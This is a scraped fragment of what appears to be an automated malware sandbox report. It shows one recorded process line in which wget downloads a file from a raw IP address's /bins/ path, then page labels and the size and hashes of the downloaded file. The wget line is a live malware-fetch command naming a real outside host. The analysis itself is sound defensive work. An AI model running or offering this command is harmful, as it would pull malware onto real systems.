/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:882
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97